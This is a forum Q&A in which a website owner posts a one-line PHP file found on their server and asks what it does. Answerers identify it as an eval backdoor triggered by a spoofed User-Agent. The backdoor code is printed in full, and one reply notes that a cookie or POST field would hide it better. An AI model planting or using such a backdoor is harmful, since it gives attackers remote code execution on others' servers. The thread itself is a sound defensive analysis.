# A suspicious PHP file might

Tags: php, hackage

I'm searching for your help today to get some help about a file I founded in my FTP this morning. I'm not a professionnal in all those PHP functions so this is why I post it here.

The thing I found was a file named *index.php* in a sub-images folder.

There is the raw code :

```
<?php

if (eregi("final",$_SERVER['HTTP_USER_AGENT'])) { eval(str_replace('Mozilla/5.0 (3.1.final) ','',$_SERVER['HTTP_USER_AGENT'])); die; }

?>
```

The two PHP functions

- eregi(); -> http://php.net/manual/en/function.eregi.php
- eval(); -> http://php.net/manual/en/function.eval.php

For the function **eval()** they are saying that it is very dangerous.

> **Caution** The eval() language construct is very dangerous because it allows execution of arbitrary PHP code. Its use thus is discouraged.
>   If you have carefully verified that there is no other option than to
>   use this construct, pay special attention not to pass any user
>   provided data into it without properly validating it beforehand.

This is why I think it might be an attempt from some one to hack my website or even more.

Any one has the capability to decode this and explain it to me?

Thx,

Comment: Sidenote: `eregi` is an old deprecated function which has been replaced by `preg_match()`. If you didn't put it there, then yeah, you've been hacked.

Comment: `hackage` is the correct tag :?

Comment: As @Fred-ii- stated, if you found this piece of code in a file on your server and you did not put it there, then someone has access to your server as well. id recommend changing your password immediately

Comment: eval on `$_SERVER['HTTP_USER_AGENT']`? Yeah, it's utterly ludicrously dangerously stupid code. If you didn't write this, then you should consider your server toxic waste and act accordingly. If you did, then you really need to learn how to code securely.

Comment: Sidenote: This may have been caused by using some form of CMS such as WordPress, Joomla etc. with an outdated/insecure plugin. Or, someone accessed your site via another backdoor which may have been your web host service's fault; I've seen that happen before. As already mentioned, change your password right away and to a much stronger one, not using common readable words.

Answer (score 2, accepted):

Let's start from the begining.

- `eregi` is a deprecated function as of PHP 5.3.0.
- `eregi` is a case insensitive regular expression.

#### So, what's it doing?

```
if (eregi("final",$_SERVER['HTTP_USER_AGENT'])) {
```

If `final` is in the `HTTP_USER_AGENT`, then....

Replace 'Mozilla/5.0 (3.1.final) ' with [blank] in the `HTTP_USER_AGENT`. And kill the script.

#### Conclusion

<s>It's ineffective in terms of altering data on your site, but will render your site "dead" to anybody with the word `final` in their [user agent](http://www.useragentstring.com/pages/All/) - which, I think, will be all final version released of every major browser; although I cannot find any source on this.</s>

### Edit

The `eval` got me wondering. Since it's evident you didn't put it here, `eval` will evaluate code and execute it - which is a concern of an attack. The only way for somebody to get remote code to execute on your site is to "spoof" their user agent ensuring they have the phrase `Mozilla/5.0 (3.1.final)` in there followed by all the code they want executing. For example;

I spoof my user agent to become

```
Mozilla/5.0 (3.1.final)  echo 'Lol, you got hacked'
```

Because of the `str_replace`, the screen will just render the words `Lol, you got hacked` because `eval` will execute the `echo`. Of course, an attacker will put **much more harmful** commands to be evaluated. ***Remove this code immediately***

Comment: Thanks @Fred-ii- It sure is a weird piece of script

Comment: Updated answer will concern of a possible attack.

Comment: As it was not me who uploaded this in my folder, I was already sure it was a possible attack, but I had to figured out it how this piece of code was doing..

Answer (score 3):

Yes, it's a simple eval backdoor, installed so that someone can come back at any time later and use your server for anything nefarious that they want to.

It accepts a user agent string starting with `Mozilla/5.0 (3.1.final)` (which is not a real user agent string), and treats the rest of the string as PHP code, which is executed via the `eval` call.

(The strange part is that they used the user agent for this, since that field is routinely logged in standard web logs. Using a POST field or cookie would be much more covert.)